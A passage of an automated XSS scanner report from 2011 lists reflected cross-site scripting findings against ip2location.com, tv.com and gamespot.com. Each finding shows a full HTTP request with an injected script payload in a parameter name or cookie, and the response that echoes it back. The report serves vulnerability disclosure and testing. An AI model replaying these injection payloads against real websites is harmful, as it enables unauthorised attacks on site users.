Cookie: ctk=NGRiOGE4ODFhZGMxZDZmM2Q2OWU1OTczYzVhYg%3D%3D; gspot_promo_042711=1; gspot_side_042711=1; hello_from_gs=1; MAD_FIRSTPAGE=1; MADTEST=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDsc240b"><script>alert(1)</script>2adf0912472; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:47:43 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Fri, 27-May-2011 23:47:43 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_042711=2; expires=Sat, 30-Apr-2011 23:47:43 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 71344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
subnav;top_games&ptid=6054&onid=39&PD=0&xref=http%3A%2F%2Fwww.gamespot.com%2F&_unsafe_xref=http://www.gamespot.com/&edid=107&ts=1303948063&oid=6054-39_6-0-0&ld=www.gamespot.com&clgf=Cg8JIk24ijttAAAASDsc240b\"><script>alert(1)</script>2adf0912472&globid=&url=http%3A%2F%2Fwww.gamespot.com%2Fgames.html%3Ftype%3Dtop_rated%26mode%3Dtop%26page_type%3Dgames%26om_act%3Dconvert%26om_clk%3Dsubnav%26tag%3Dsubnav%253Btop_games&_unsafe_url=http://www.game
...[SNIP]...

3.864. http://www.ip2location.com/ib2/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ip2location.com
Path:	/ib2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c98"><script>alert(1)</script>db371f44367 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ib2/?53c98"><script>alert(1)</script>db371f44367=1 HTTP/1.1
Host: www.ip2location.com
Proxy-Connection: keep-alive
Referer: http://www.witopia.net/index.php/products/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Wed, 27 Apr 2011 21:14:09 GMT
Server: Microsoft-IIS/6.0
Location: http://tools.ip2location.com/ib2?53c98"><script>alert(1)</script>db371f44367=1
Content-Length: 264
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1><p>The document has moved <a href="http://tools.ip2location.com/ib2?53c98"><script>alert(1)</script>db371f44367=1">
...[SNIP]...

3.865. http://www.tv.com/shows/ [XCLGFbrowser cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tv.com
Path:	/shows/

Issue detail

The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb03"><script>alert(1)</script>1400460f810 was submitted in the XCLGFbrowser cookie. This input was echoed as dcb03\"><script>alert(1)</script>1400460f810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /shows/?tag=nav_top;shows HTTP/1.1
Host: www.tv.com
Proxy-Connection: keep-alive
Referer: http://www.tv.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo4NDA%3D; ab_test=B; tv_interstitial=1; tv_stats=d41d8cd98f00b204e9800998ecf8427e; MAD_SESSION=c; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=141309943.1303947442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=141309943.1481421202.1303947442.1303947442.1303947442.1; __utmc=141309943; __utmb=141309943.1.10.1303947442; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265; XCLGFbrowser=Cg8JIk24ijttAAAASDsdcb03"><script>alert(1)</script>1400460f810; base_domain_9ecec4fd9dbc407e5d9b83aa0eb89270=tv.com; fbsetting_9ecec4fd9dbc407e5d9b83aa0eb89270=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:44:52 GMT
Server: Apache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: tv_interstitial=2; expires=Thu, 28-Apr-2011 23:44:52 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 132348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
10908_45-0&edid=3&ptId=6136&onid=10908&ctype=&cval=&asId=0&astId=&pid=&prodtypid=&ttag=&tag=nav_top;shows&loc=&srch=&xref=http%3A%2F%2Fwww.tv.com%2F&xrq=&useract=&ld=www.tv.com&clgf=Cg8JIk24ijttAAAASDsdcb03\"><script>alert(1)</script>1400460f810&globid=&ts=1303947892" border="0" height="1" width="1" alt="" />
...[SNIP]...

Report generated by XSS.CX at Sun May 01 05:19:55 CDT 2011.